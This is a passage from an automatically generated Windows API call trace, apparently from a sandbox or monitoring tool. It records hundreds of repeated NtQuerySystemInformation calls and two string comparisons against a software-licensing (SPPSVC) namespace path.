SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x28, ResultLength=0x0) [0269.527] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0269.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0269.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0269.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0269.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0269.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0269.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0269.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0269.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0269.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x28, ResultLength=0x0) [0269.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x28, ResultLength=0x0) [0269.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0269.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x20, ResultLength=0x0) [0269.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0269.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0269.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0269.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x20, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x28, ResultLength=0x0) [0269.537] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0269.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0269.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x50, ResultLength=0x0) [0269.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0269.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x28, ResultLength=0x0) [0269.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x28, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x20, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x38, ResultLength=0x0) [0269.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x20, ResultLength=0x0) [0269.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0269.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0269.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0269.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0269.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0269.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x28, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3c0, Length=0x20, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0269.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0269.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0269.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0269.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x28, ResultLength=0x0) [0269.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3c0, Length=0x20, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0269.568] NtQuerySystemInformation 